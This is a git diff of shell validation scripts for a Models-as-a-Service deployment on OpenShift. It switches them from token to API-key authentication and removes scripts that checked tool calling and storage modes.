+    OC_TOKEN="${ADMIN_OC_TOKEN:-}"
+    if [ -z "$OC_TOKEN" ] && command -v oc &> /dev/null; then
+        OC_TOKEN="$(oc whoami -t 2>/dev/null || echo "")"
+    fi
+
+    if [ -n "$OC_TOKEN" ]; then
+        print_success "OpenShift identity token available"
+    elif command -v oc &> /dev/null; then
+        print_warning "Cannot get OpenShift token" "Not logged into oc CLI" "Run: oc login"
+    else
+        print_warning "Cannot get OpenShift token" "Neither ADMIN_OC_TOKEN nor oc CLI is available" "Set ADMIN_OC_TOKEN or install oc CLI"
+    fi
+
+    # Create a MaaS API key using the OC token
+    if [ -n "$OC_TOKEN" ]; then
+        print_check "MaaS API key creation"
+        API_KEY_NAME="validate-test-$(date +%s)"
+        API_KEY_RESPONSE=$(curl -sSk --connect-timeout 10 --max-time 30 \
+            -H "Authorization: Bearer $OC_TOKEN" \
+            -H "Content-Type: application/json" \
+            -X POST \
+            -d "{\"expiresIn\": \"1h\", \"name\": \"$API_KEY_NAME\"}" \
+            -w "\n%{http_code}" \
+            "${HOST}/maas-api/v1/api-keys" 2>/dev/null || echo "")
+        API_KEY_HTTP_CODE=$(echo "$API_KEY_RESPONSE" | tail -n1)
+        API_KEY_BODY=$(echo "$API_KEY_RESPONSE" | sed '$d')
+
+        if [ "$API_KEY_HTTP_CODE" = "201" ]; then
+            TOKEN=$(echo "$API_KEY_BODY" | jq -r '.key // empty' 2>/dev/null)
+            API_KEY_ID=$(echo "$API_KEY_BODY" | jq -r '.id // empty' 2>/dev/null)
+            if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ] && [ -n "$API_KEY_ID" ] && [ "$API_KEY_ID" != "null" ]; then
+                print_success "MaaS API key created (name: $API_KEY_NAME)"
+                # Set up cleanup trap to delete the API key on exit
+                cleanup_api_key() {
+                    if [ -n "${API_KEY_ID:-}" ] && [ "${API_KEY_ID}" != "null" ]; then
+                        curl -sSk -o /dev/null \
+                            -H "Authorization: Bearer $OC_TOKEN" \
+                            -X DELETE \
+                            "${HOST}/maas-api/v1/api-keys/${API_KEY_ID}" 2>/dev/null || true
+                    fi
+                }
+                cleanup_and_exit() {
+                    local status="$1"
+                    trap - EXIT
+                    cleanup_api_key
+                    exit "$status"
+                }
+                trap cleanup_api_key EXIT
+                trap 'cleanup_and_exit 130' INT
+                trap 'cleanup_and_exit 143' TERM
+            else
+                print_fail "Failed to parse API key from response" \
+                    "Response omitted because it may contain the plaintext API key"
+                # Clean up the API key if we got an ID but failed to parse the key
+                if [ -n "$API_KEY_ID" ]; then
+                    curl -sSk -o /dev/null \
+                        -H "Authorization: Bearer $OC_TOKEN" \
+                        -X DELETE \
+                        "${HOST}/maas-api/v1/api-keys/${API_KEY_ID}" 2>/dev/null || true
+                fi
+                TOKEN=""
+                API_KEY_ID=""
+            fi
         else
-            print_warning "Cannot get OpenShift token" "Not logged into oc CLI" "Run: oc login"
+            print_fail "Failed to create MaaS API key (HTTP $API_KEY_HTTP_CODE)" \
+                "Response: $(echo "$API_KEY_BODY" | head -c 200)" \
+                "Check MaaS API key endpoint: ${HOST}/maas-api/v1/api-keys"
+            TOKEN=""
         fi
-    else
-        print_warning "oc CLI not found" "Cannot test authentication" "Install oc CLI or use kubectl with token"
-        TOKEN=""
     fi
     
     # Test models endpoint
diff --git a/scripts/validate-tool-calling.sh b/scripts/validate-tool-calling.sh
deleted file mode 100755
index 720c184da..000000000
--- a/scripts/validate-tool-calling.sh
+++ /dev/null
@@ -1,403 +0,0 @@
-#!/bin/bash
-
-# MaaS Tool Calling Validation Script
-# This script validates that tool calling functionality works with vLLM models
-#
-# Usage: ./validate-tool-calling.sh [MODEL_NAME]
-#   MODEL_NAME: Optional. If provided, the script will validate using this specific model
-
-# Note: We don't use 'set -e' because we want to continue validation even if some checks fail
-
-# Parse command line arguments
-REQUESTED_MODEL=""
-
-# Show help if requested
-if [ "$1" = "--help" ] || [ "$1" = "-h" ]; then
-    echo "MaaS Tool Calling Validation Script"
-    echo ""
-    echo "Usage: $0 [MODEL_NAME]"
-    echo ""
-    echo "This script validates that tool calling functionality works with vLLM models."
-    echo "It performs a single test call to the endpoint with a basic tool definition."
-    echo ""
-    echo "Arguments:"
-    echo "  MODEL_NAME    Optional. Name of a specific model to use for validation."
-    echo "                If not provided, the first available model will be used."
-    echo ""
-    echo "Examples:"
-    echo "  # Basic tool calling validation"
-    echo "  $0                                              # Validate using first available model"
-    echo "  $0 single-node-no-scheduler-nvidia-gpu         # Validate using specific model"
-    echo ""
-    echo "Exit Codes:"
-    echo "  0    Tool calling validation passed"
-    echo "  1    Tool calling validation failed"
-    echo ""
-    exit 0
-fi
-
-# Parse arguments
-if [ $# -gt 0 ]; then
-    REQUESTED_MODEL="$1"
-fi
-
-# Color codes for output
-RED='\033[0;31m'
-GREEN='\033[0;32m'
-YELLOW='\033[1;33m'
-BLUE='\033[0;34m'
-NC='\033[0m' # No Color
-
-# Helper functions for colored output
-print_check() {
-    echo -e "${BLUE}✓${NC} $1"
-}
-
-print_success() {
-    echo -e "${GREEN}✓${NC} $1"
-}
-
-print_fail() {
-    echo -e "${RED}✗${NC} $1"
-    if [ -n "$2" ]; then
-        echo -e "    ${YELLOW}→${NC} $2"
-    fi
-    if [ -n "$3" ]; then
-        echo -e "    ${YELLOW}→${NC} $3"
-    fi
-}
-
-print_warning() {
-    echo -e "${YELLOW}⚠${NC} $1"
-    if [ -n "$2" ]; then
-        echo -e "    ${YELLOW}→${NC} $2"
-    fi
-}
-
-print_info() {
-    echo -e "${BLUE}ℹ${NC} $1"
-}
-
-# Get authentication token
-get_auth_token() {
-    print_check "Getting authentication token"
-    
-    if [ -z "$HOST" ]; then
-        print_fail "Host not set - cannot get authentication token"
-        return 1
-    fi
-    
-    ENDPOINT="${HOST}/maas-api/v1/tokens"
-    print_info "Testing: curl -sSk -X POST $ENDPOINT -H 'Authorization: Bearer \$(oc whoami -t)' -H 'Content-Type: application/json' -d '{\"expiration\": \"10m\"}'"
-    
-    if command -v oc &> /dev/null; then
-        OC_TOKEN=$(oc whoami -t 2>/dev/null || echo "")
-        if [ -n "$OC_TOKEN" ]; then
-            TOKEN_RESPONSE=$(curl -sSk --connect-timeout 10 --max-time 30 -w "\n%{http_code}" \
-                -H "Authorization: Bearer ${OC_TOKEN}" \
-                -H "Content-Type: application/json" \
-                -X POST \
-                -d '{"expiration": "10m"}' \
-                "${ENDPOINT}" 2>/dev/null || echo "")
-            
-            HTTP_CODE=$(echo "$TOKEN_RESPONSE" | tail -n1)
-            RESPONSE_BODY=$(echo "$TOKEN_RESPONSE" | sed '$d')
-            
-            # Handle timeout/connection failure
-            if [ -z "$HTTP_CODE" ] || [ "$HTTP_CODE" = "000" ]; then
-                print_fail "Connection timeout or failed to reach endpoint" \
-                    "The endpoint is not reachable. This is likely because:" \
-                    "1) The endpoint is behind a VPN or firewall, 2) DNS resolution failed, 3) Gateway/Route not properly configured"
-                return 1
-            elif [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
-                TOKEN=$(echo "$RESPONSE_BODY" | jq -r '.token' 2>/dev/null || echo "")
-                if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ]; then
-                    print_success "Authentication successful (HTTP $HTTP_CODE)"
-                    return 0
-                else
-                    print_fail "Authentication response invalid" "Received HTTP $HTTP_CODE but no token in response" "Check MaaS API logs: kubectl logs -n maas-api -l app=maas-api"
-                    return 1
-                fi
-            elif [ "$HTTP_CODE" = "404" ]; then
-                print_fail "Endpoint not found (HTTP 404)" \
-                    "Traffic is reaching the Gateway/pods but the path is incorrect" \
-                    "Check HTTPRoute configuration: kubectl describe httproute maas-api-route -n maas-api"
-                return 1
-            elif [ "$HTTP_CODE" = "502" ] || [ "$HTTP_CODE" = "503" ]; then
-                print_fail "Gateway/Service error (HTTP $HTTP_CODE)" \
-                    "The Gateway is not able to reach the backend service" \
-                    "Check: 1) MaaS API pods are running: kubectl get pods -n maas-api, 2) Service exists: kubectl get svc maas-api -n maas-api"
-                return 1
-            else
-                print_fail "Authentication failed (HTTP $HTTP_CODE)" "Response: $(echo $RESPONSE_BODY | head -c 100)" "Check AuthPolicy and MaaS API service"
-                return 1
-            fi
-        else
-            print_fail "Cannot get OpenShift token" "Not logged into oc CLI" "Run: oc login"
-            return 1
-        fi
-    else
-        print_fail "oc CLI not found" "Cannot test authentication" "Install oc CLI or use kubectl with token"
-        return 1
-    fi
-}
-
-# Get the MaaS API host
-get_maas_host() {
-    print_check "Getting MaaS API host"
-    
-    # Get cluster domain and construct the MaaS gateway hostname
-    CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}' 2>/dev/null || echo "")
-    if [ -n "$CLUSTER_DOMAIN" ]; then
-        HOST="maas.${CLUSTER_DOMAIN}"
-        print_success "Gateway hostname: $HOST"
-        return 0
-    else
-        print_fail "Could not determine cluster domain" "Cannot test API endpoints" "Check: kubectl get ingresses.config.openshift.io cluster"
-        return 1
-    fi
-}
-
-# Get available models
-get_available_models() {
-    print_check "Getting available models"
-    
-    if [ -z "$TOKEN" ] || [ -z "$HOST" ]; then
-        print_fail "Missing token or host"
-        return 1
-    fi
-    
-    ENDPOINT="${HOST}/maas-api/v1/models"
-    print_info "Testing: curl -sSk $ENDPOINT -H 'Authorization: Bearer \$TOKEN'"
-    
-    MODELS_RESPONSE=$(curl -sSk --connect-timeout 10 --max-time 30 -w "\n%{http_code}" \
-        -H "Content-Type: application/json" \
-        -H "Authorization: Bearer ${TOKEN}" \
-        "${ENDPOINT}" 2>/dev/null || echo "")
-    
-    HTTP_CODE=$(echo "$MODELS_RESPONSE" | tail -n1)
-    RESPONSE_BODY=$(echo "$MODELS_RESPONSE" | sed '$d')
-    
-    if [ "$HTTP_CODE" = "200" ]; then
-        MODEL_COUNT=$(echo "$RESPONSE_BODY" | jq -r '.data | length' 2>/dev/null || echo "0")
-        if [ "$MODEL_COUNT" -gt 0 ]; then
-            print_success "Found $MODEL_COUNT model(s)"
-            
-            # Print list of available models
-            print_info "Available models:"
-            echo "$RESPONSE_BODY" | jq -r '.data[] | "  • \(.id) - \(.url)"' 2>/dev/null || echo "  Could not parse model list"
-            echo ""
-            
-            # Check if a specific model was requested
-            if [ -n "$REQUESTED_MODEL" ]; then
-                MODEL_INDEX=$(echo "$RESPONSE_BODY" | jq -r ".data | map(.id) | index(\"$REQUESTED_MODEL\")" 2>/dev/null || echo "null")
-                
-                if [ "$MODEL_INDEX" != "null" ] && [ -n "$MODEL_INDEX" ]; then
-                    MODEL_NAME=$(echo "$RESPONSE_BODY" | jq -r ".data[$MODEL_INDEX].id" 2>/dev/null || echo "")
-                    MODEL_CHAT=$(echo "$RESPONSE_BODY" | jq -r ".data[$MODEL_INDEX].url" 2>/dev/null || echo "")
-                    print_info "Using requested model: $MODEL_NAME for tool calling validation"
-                else
-                    print_fail "Requested model '$REQUESTED_MODEL' not found" "See available models above"
-                    return 1
-                fi
-            else
-                # Use the first available model
-                MODEL_NAME=$(echo "$RESPONSE_BODY" | jq -r '.data[0].id' 2>/dev/null || echo "")
-                MODEL_CHAT=$(echo "$RESPONSE_BODY" | jq -r '.data[0].url' 2>/dev/null || echo "")
-                print_info "Using first available model: $MODEL_NAME for tool calling validation"
-            fi
-            
-            # Set the inference endpoint
-            if [ -n "$MODEL_CHAT" ] && [ "$MODEL_CHAT" != "null" ]; then
-                MODEL_CHAT_ENDPOINT="${MODEL_CHAT}/v1/chat/completions"
-                return 0
-            else
-                print_fail "Model endpoint not found for $MODEL_NAME"
-                return 1
-            fi
-        else
-            print_fail "No models found" "Deploy a model first"
-            return 1
-        fi
-    else
-        print_fail "Failed to get models (HTTP $HTTP_CODE)" "Response: $(echo $RESPONSE_BODY | head -c 100)"
-        return 1
-    fi
-}
-
-# Test tool calling functionality
-test_tool_calling() {
-    print_check "Testing tool calling functionality"
-    
-    if [ -z "$TOKEN" ] || [ -z "$MODEL_NAME" ] || [ -z "$MODEL_CHAT_ENDPOINT" ]; then
-        print_fail "Missing required parameters for tool calling test"
-        return 1
-    fi
-    
-    # Define a simple tool for testing
-    TOOL_CALLING_PAYLOAD=$(cat <<EOF
-{
-  "model": "${MODEL_NAME}",
-  "messages": [
-    {
-      "role": "user",
-      "content": "What's the weather like in San Francisco? Use the get_weather tool to check."
-    }
-  ],
-  "tools": [
-    {
-      "type": "function",
-      "function": {
-        "name": "get_weather",
-        "description": "Get the current weather in a given location",
-        "parameters": {
-          "type": "object",
-          "properties": {
-            "location": {
-              "type": "string",
-              "description": "The city and state, e.g. San Francisco, CA"
-            },
-            "unit": {
-              "type": "string",
-              "enum": ["celsius", "fahrenheit"],
-              "description": "The unit of temperature"
-            }
-          },
-          "required": ["location"]
-        }
-      }
-    }
-  ],
-  "tool_choice": "auto",
-  "max_tokens": 100
-}
-EOF
-)
-    
-    print_info "Testing tool calling with model: $MODEL_NAME"
-    print_info "Endpoint: $MODEL_CHAT_ENDPOINT"
-    print_info "Tool: get_weather (weather checking function)"
-    
-    INFERENCE_RESPONSE=$(curl -sSk --connect-timeout 30 --max-time 60 -w "\n%{http_code}" \
-        -H "Authorization: Bearer ${TOKEN}" \
-        -H "Content-Type: application/json" \
-        -d "${TOOL_CALLING_PAYLOAD}" \
-        "${MODEL_CHAT_ENDPOINT}" 2>/dev/null || echo "")
-    
-    HTTP_CODE=$(echo "$INFERENCE_RESPONSE" | tail -n1)
-    RESPONSE_BODY=$(echo "$INFERENCE_RESPONSE" | sed '$d')
-    
-    if [ -z "$HTTP_CODE" ] || [ "$HTTP_CODE" = "000" ]; then
-        print_fail "Connection timeout or failed to reach endpoint" \
-            "Model endpoint is not reachable" \
-            "Check Gateway and model HTTPRoute: kubectl get httproute -n llm"
-        return 1
-    elif [ "$HTTP_CODE" = "200" ]; then
-        # Check if the response contains tool calls
-        TOOL_CALLS=$(echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls // empty' 2>/dev/null)
-        
-        if [ -n "$TOOL_CALLS" ] && [ "$TOOL_CALLS" != "null" ]; then
-            print_success "Tool calling functionality working!"
-            print_info "Model successfully generated tool calls"
-            
-            # Extract and display tool call details
-            TOOL_CALL_COUNT=$(echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls | length' 2>/dev/null || echo "0")
-            print_info "Number of tool calls generated: $TOOL_CALL_COUNT"
-            
-            # Display the tool calls
-            echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls[]? | "  • Tool: \(.function.name) - Args: \(.function.arguments)"' 2>/dev/null || echo "  Could not parse tool calls"
-            
-            # Check if the tool call is for our test function
-            WEATHER_TOOL_CALL=$(echo "$RESPONSE_BODY" | jq -r '.choices[0].message.tool_calls[]? | select(.function.name == "get_weather")' 2>/dev/null)
-            if [ -n "$WEATHER_TOOL_CALL" ]; then
-                print_success "Model correctly identified the need to use the get_weather tool"
-                print_info "Tool call arguments: $(echo "$WEATHER_TOOL_CALL" | jq -r '.function.arguments' 2>/dev/null)"
-            else
-                print_warning "Model generated tool calls but not for the expected get_weather tool"
-            fi
-            
-            return 0
-        else
-            print_fail "Tool calling not working - no tool calls in response" \
-                "The model may not support tool calling or the configuration is incorrect" \
-                "Check: 1) Model supports tool calling, 2) VLLM_ADDITIONAL_ARGS includes --tool-call-parser, 3) Model is properly configured"
-            
-            print_info "Response content: $(echo $RESPONSE_BODY | head -c 300)"
-            return 1
-        fi
-    elif [ "$HTTP_CODE" = "404" ]; then
-        print_fail "Model inference endpoint not found (HTTP 404)" \
-            "Path is incorrect - traffic reaching but wrong path" \
-            "Check model HTTPRoute configuration: kubectl get httproute -n llm"
-        return 1
-    elif [ "$HTTP_CODE" = "502" ] || [ "$HTTP_CODE" = "503" ]; then
-        print_fail "Gateway/Service error (HTTP $HTTP_CODE)" \
-            "Gateway cannot reach model service" \
-            "Check: 1) Model pods running: kubectl get pods -n llm, 2) Model service exists, 3) HTTPRoute configured"
-        return 1
-    elif [ "$HTTP_CODE" = "401" ]; then
-        print_fail "Authorization failed (HTTP 401)" \
-            "Response: $(echo $RESPONSE_BODY | head -c 200)" \
-            "Check AuthPolicy and TokenRateLimitPolicy"
-        return 1
-    elif [ "$HTTP_CODE" = "429" ]; then
-        print_warning "Rate limiting (HTTP 429)" \
-            "Response: $(echo $RESPONSE_BODY | head -c 200)" \
-            "Wait a minute and try again"
-        return 1
-    else
-        print_fail "Tool calling test failed (HTTP $HTTP_CODE)" \
-            "Response: $(echo $RESPONSE_BODY | head -c 200)" \
-            "Check model pod logs and configuration"
-        return 1
-    fi
-}
-
-# Main validation function
-main() {
-    echo "🔧 MaaS Tool Calling Validation Script"
-    echo "======================================"
-    echo ""
-    
-    # Initialize variables
-    TOKEN=""
-    HOST=""
-    MODEL_NAME=""
-    MODEL_CHAT_ENDPOINT=""
-    
-    # Get MaaS API host first (needed for authentication)
-    if ! get_maas_host; then
-        echo ""
-        echo "❌ Tool calling validation failed: Could not get MaaS API host"
-        exit 1
-    fi
-    
-    # Get authentication token
-    if ! get_auth_token; then
-        echo ""
-        echo "❌ Tool calling validation failed: Could not get authentication token"
-        exit 1
-    fi
-    
-    # Get available models
-    if ! get_available_models; then
-        echo ""
-        echo "❌ Tool calling validation failed: Could not get available models"
-        exit 1
-    fi
-    
-    # Test tool calling functionality
-    if ! test_tool_calling; then
-        echo ""
-        echo "❌ Tool calling validation failed: Tool calling test did not pass"
-        exit 1
-    fi
-    
-    echo ""
-    echo "✅ Tool calling validation completed successfully!"
-    echo "   The vLLM model is properly configured for tool calling functionality."
-    exit 0
-}
-
-# Run main function
-main "$@"
\ No newline at end of file
diff --git a/scripts/verify-models-and-limits.sh b/scripts/verify-models-and-limits.sh
index f4952584a..de4fbdef4 100755
--- a/scripts/verify-models-and-limits.sh
+++ b/scripts/verify-models-and-limits.sh
@@ -1,6 +1,10 @@
 #!/bin/bash
 
-# Source helper functions for JWT decoding
+# Verifies model inference and rate limiting through the MaaS API gateway.
+# Requires the maas-api-auth-policy to support API key authentication
+# (deployment/base/maas-api/policies/auth-policy.yaml).
+
+# Source shared helper functions
 SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 source "$SCRIPT_DIR/deployment-helpers.sh"
 
@@ -73,7 +77,7 @@ echo ""
 echo -e "${BLUE}Gateway URL:${NC} ${GATEWAY_URL}"
 echo ""
 
-echo -e "${BLUE}Obtaining token from MaaS API...${NC}"
+echo -e "${BLUE}Obtaining API key from MaaS API...${NC}"
 
 OC_TOKEN=$(oc whoami -t 2>/dev/null)
 if [ -z "$OC_TOKEN" ]; then
@@ -82,40 +86,44 @@ if [ -z "$OC_TOKEN" ]; then
     exit 1
 fi
 
+KEY_NAME="verify-test-$(date +%s)"
+
 TOKEN_RESPONSE=$(curl -sSk \
     -H "Authorization: Bearer $OC_TOKEN" \
     -H "Content-Type: application/json" \
     -X POST \
-    -d '{"expiration": "1h"}' \
+    -d "{\"expiresIn\": \"1h\", \"name\": \"$KEY_NAME\"}" \
     -w "\nHTTP_STATUS:%{http_code}\n" \
-    "${API_BASE}/maas-api/v1/tokens" 2>&1)
+    "${API_BASE}/maas-api/v1/api-keys" 2>&1)
 
 http_status=$(echo "$TOKEN_RESPONSE" | grep "HTTP_STATUS:" | cut -d':' -f2)
 response_body=$(echo "$TOKEN_RESPONSE" | sed '/HTTP_STATUS:/d')
 
 if [ "$http_status" != "201" ]; then
-    echo -e "${RED}Failed to obtain token from MaaS API!${NC}"
+    echo -e "${RED}Failed to create API key from MaaS API!${NC}"
     echo -e "${RED}HTTP Status: $http_status${NC}"
     echo -e "${RED}Response: $response_body${NC}"
     exit 1
 fi
 
-TOKEN=$(echo "$response_body" | jq -r '.token' 2>/dev/null)
-if [ -z "$TOKEN" ] || [ "$TOKEN" = "null" ]; then
-    echo -e "${RED}Failed to parse token from response!${NC}"
+TOKEN=$(echo "$response_body" | jq -r '.key' 2>/dev/null)
+KEY_ID=$(echo "$response_body" | jq -r '.id' 2>/dev/null)
+if [ -z "$TOKEN" ] || [ "$TOKEN" = "null" ] || [ -z "$KEY_ID" ] || [ "$KEY_ID" = "null" ]; then
+    echo -e "${RED}Failed to parse API key from response!${NC}"
     exit 1
 fi
 
-echo -e "${GREEN}✓ Token obtained successfully from MaaS API${NC}"
+cleanup_api_key() {
+    if [ -n "${KEY_ID:-}" ] && [ "${KEY_ID}" != "null" ]; then
+        curl -sSk -o /dev/null -w "" \
+            -H "Authorization: Bearer $OC_TOKEN" \
+            -X DELETE \
+            "${API_BASE}/maas-api/v1/api-keys/${KEY_ID}" 2>/dev/null || true
+    fi
+}
+trap cleanup_api_key EXIT INT TERM
 
-# Use helper function to decode JWT payload
-TOKEN_PAYLOAD=$(decode_jwt_payload "$TOKEN")
-if [ -z "$TOKEN_PAYLOAD" ]; then
-    echo -e "${YELLOW}Warning:${NC} Failed to decode MaaS token payload"
-    USER_NAME="unknown"
-else
-    USER_NAME=$(echo "$TOKEN_PAYLOAD" | jq -r '.sub // "unknown"' 2>/dev/null)
-fi
+echo -e "${GREEN}✓ API key created successfully (name: $KEY_NAME)${NC}"
 
 echo -e "${BLUE}Discovering available models...${NC}"
 MODELS_RESPONSE=$(curl -sSk \
@@ -316,8 +324,8 @@ echo -e "${CYAN}======================================${NC}"
 echo ""
 
 echo -e "${BLUE}Authentication:${NC}"
-echo -e "  ${GREEN}✓${NC} MaaS API token endpoint is working"
-echo -e "  ${GREEN}✓${NC} Token authentication successful"
+echo -e "  ${GREEN}✓${NC} MaaS API key endpoint is working"
+echo -e "  ${GREEN}✓${NC} API key authentication successful"
 echo ""
 
 echo -e "${BLUE}Model Discovery:${NC}"
@@ -347,7 +355,6 @@ fi
 echo ""
 
 echo -e "${BLUE}Gateway URL:${NC} ${GATEWAY_URL}"
-echo -e "${BLUE}User:${NC} $USER_NAME"
 echo ""
 
 if [ "$MODEL_COUNT" -gt 0 ]; then
@@ -357,3 +364,4 @@ if [ "$MODEL_COUNT" -gt 0 ]; then
     done
     echo ""
 fi
+
diff --git a/scripts/verify-storage-modes.sh b/scripts/verify-storage-modes.sh
deleted file mode 100755
index 05c89edce..000000000
--- a/scripts/verify-storage-modes.sh
+++ /dev/null
@@ -1,417 +0,0 @@
-#!/bin/bash
-# Verifies all 3 storage modes: In-Memory SQLite, SQLite with PVC, PostgreSQL
-# Usage: ./scripts/verify-storage-modes.sh
-
-set -uo pipefail
-
-R='\033[0;31m'
-G='\033[0;32m'
-Y='\033[1;33m'
-B='\033[0;34m'
-C='\033[0;36m'
-M='\033[0;35m'
-W='\033[1;37m'
-NC='\033[0m'
-
-NAMESPACE="maas-api"
-PROJECT_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
-
-banner() {
-    echo ""
-    echo -e "${C}╔══════════════════════════════════════════════════════════════════╗${NC}"
-    echo -e "${C}║${W}  $1${C}$(printf '%*s' $((62 - ${#1})) '')║${NC}"
-    echo -e "${C}╚══════════════════════════════════════════════════════════════════╝${NC}"
-}
-
-step() { echo -e "\n${M}▶ $1${NC}"; }
-ok() { echo -e "  ${G}✓ $1${NC}"; }
-fail() { echo -e "  ${R}✗ $1${NC}"; }
-info() { echo -e "  ${B}ℹ $1${NC}"; }
-
-wait_for_api() {
-    local timeout=90
-    local start=$(date +%s)
-    
-    while true; do
-        local ready=$(kubectl get pod -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api \
-            -o jsonpath='{.items[0].status.conditions[?(@.type=="Ready")].status}' 2>/dev/null || echo "")
-        [ "$ready" == "True" ] && break
-        [ $(($(date +%s) - start)) -gt $timeout ] && return 1
-        sleep 2
-    done
-    
-    sleep 3
-    while true; do
-        local status=$(curl -sSk -o /dev/null -w "%{http_code}" "${GATEWAY_URL}/maas-api/health" 2>/dev/null || echo "000")
-        [ "$status" == "401" ] || [ "$status" == "200" ] && return 0
-        [ $(($(date +%s) - start)) -gt $timeout ] && return 1
-        sleep 2
-    done
-}
-
-get_token() {
-    oc whoami -t 2>/dev/null || cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || true
-}
-
-discover_gateway() {
-    [ -n "${GATEWAY_URL:-}" ] && return
-    local hostname=$(kubectl get gateway maas-default-gateway -n openshift-ingress \
-        -o jsonpath='{.spec.listeners[0].hostname}' 2>/dev/null || echo "")
-    if [ -z "$hostname" ]; then
-        echo -e "${R}Failed to discover gateway. Set GATEWAY_URL manually.${NC}"
-        exit 1
-    fi
-    if curl -sSk -o /dev/null -m 5 "https://${hostname}/maas-api/health" 2>/dev/null; then
-        GATEWAY_URL="https://${hostname}"
-    else
-        GATEWAY_URL="http://${hostname}"
-    fi
-}
-
-cleanup_all() {
-    step "Cleaning up previous deployments..."
-    kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s 2>/dev/null || true
-    kubectl delete pvc maas-api-data -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=30s 2>/dev/null || true
-    kubectl delete secret database-config -n "$NAMESPACE" --ignore-not-found=true 2>/dev/null || true
-    
-    # Clean up CloudNativePG cluster
-    kubectl delete cluster maas-postgres -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=120s 2>/dev/null || true
-    
-    # Clean up old community CNPG webhooks (if they exist from previous installs, not for everyone but it was an issue in my case)
-    kubectl delete mutatingwebhookconfiguration cnpg-mutating-webhook-configuration --ignore-not-found=true 2>/dev/null || true
-    kubectl delete validatingwebhookconfiguration cnpg-validating-webhook-configuration --ignore-not-found=true 2>/dev/null || true
-    
-    local waited=0
-    while [ $waited -lt 30 ]; do
-        local count=$(kubectl get pods -n "$NAMESPACE" -l app.kubernetes.io/name=maas-api --no-headers 2>/dev/null | wc -l || echo "0")
-        [ "$count" -eq 0 ] && break
-        sleep 2
-        waited=$((waited + 2))
-    done
-    ok "Cleanup complete"
-}
-
-deploy_in_memory() {
-    step "Deploying In-Memory SQLite mode..."
-    kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s >/dev/null 2>&1
-    kustomize build "${PROJECT_ROOT}/deployment/base/maas-api" | kubectl apply -f - >/dev/null 2>&1
-    kubectl rollout status deployment/maas-api -n "$NAMESPACE" --timeout=120s >/dev/null 2>&1
-    wait_for_api
-    ok "Deployed (ephemeral storage)"
-}
-
-deploy_sqlite_pvc() {
-    step "Deploying Disk storage mode (persistent volume)..."
-    kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s >/dev/null 2>&1
-    kustomize build "${PROJECT_ROOT}/deployment/overlays/sqlite-pvc" | kubectl apply -f - >/dev/null 2>&1
-    kubectl rollout status deployment/maas-api -n "$NAMESPACE" --timeout=120s >/dev/null 2>&1
-    wait_for_api
-    ok "Deployed (persistent volume)"
-}
-
-deploy_postgresql() {
-    step "Deploying PostgreSQL mode (CloudNativePG)..."
-    
-    # Install CloudNativePG operator from OperatorHub if not present
-    if ! kubectl get crd clusters.postgresql.cnpg.io >/dev/null 2>&1; then
-        info "Installing CloudNativePG operator from OperatorHub..."
-        kubectl apply -f - >/dev/null 2>&1 <<EOF
-apiVersion: operators.coreos.com/v1alpha1
-kind: Subscription
-metadata:
-  name: cloudnative-pg
-  namespace: openshift-operators
-spec:
-  channel: stable-v1
-  name: cloudnative-pg
-  source: certified-operators
-  sourceNamespace: openshift-marketplace
-EOF
-        
-        local waited=0
-        while [ $waited -lt 180 ]; do
-            local phase=$(kubectl get csv -n openshift-operators -l operators.coreos.com/cloudnative-pg.openshift-operators -o jsonpath='{.items[0].status.phase}' 2>/dev/null || echo "")
-            [ "$phase" == "Succeeded" ] && break
-            
-            # Auto-approve install plan if needed
-            local plan=$(kubectl get subscription cloudnative-pg -n openshift-operators -o jsonpath='{.status.installPlanRef.name}' 2>/dev/null || echo "")
-            if [ -n "$plan" ]; then
-                kubectl patch installplan "$plan" -n openshift-operators --type merge -p '{"spec":{"approved":true}}' >/dev/null 2>&1 || true
-            fi
-            
-            sleep 10
-            waited=$((waited + 10))
-        done
-        
-        # Verify CRD exists now
-        if ! kubectl get crd clusters.postgresql.cnpg.io >/dev/null 2>&1; then
-            fail "CloudNativePG operator installation failed"
-            return 1
-        fi
-    fi
-    ok "CloudNativePG operator ready"
-    
-    info "Creating PostgreSQL cluster..."
-    kubectl apply -n "$NAMESPACE" -f - >/dev/null 2>&1 <<EOF
-apiVersion: postgresql.cnpg.io/v1
-kind: Cluster
-metadata:
-  name: maas-postgres
-spec:
-  instances: 1
-  storage:
-    size: 1Gi
-EOF
-
-    local waited=0
-    while [ $waited -lt 300 ]; do
-        local ready=$(kubectl get cluster maas-postgres -n "$NAMESPACE" -o jsonpath='{.status.phase}' 2>/dev/null || echo "")
-        [ "$ready" == "Cluster in healthy state" ] && break
-        sleep 5
-        waited=$((waited + 5))
-    done
-    
-    if [ "$ready" != "Cluster in healthy state" ]; then
-        fail "PostgreSQL cluster not ready after 5 minutes"
-        return 1
-    fi
-    ok "PostgreSQL cluster ready"
-    
-    info "Configuring database credentials..."
-    local pgpassword=$(kubectl get secret maas-postgres-app -n "$NAMESPACE" -o jsonpath='{.data.password}' | base64 -d)
-    kubectl create secret generic database-config \
-        --from-literal=DB_CONNECTION_URL="postgresql://app:${pgpassword}@maas-postgres-rw:5432/app?sslmode=require" \
-        -n "$NAMESPACE" --dry-run=client -o yaml | kubectl apply -f - >/dev/null 2>&1
-    
-    kubectl delete deployment maas-api -n "$NAMESPACE" --ignore-not-found=true --wait=true --timeout=60s >/dev/null 2>&1
-    # Apply base deployment with external storage mode
-    kustomize build "${PROJECT_ROOT}/deployment/overlays/openshift" | kubectl apply -f - >/dev/null 2>&1
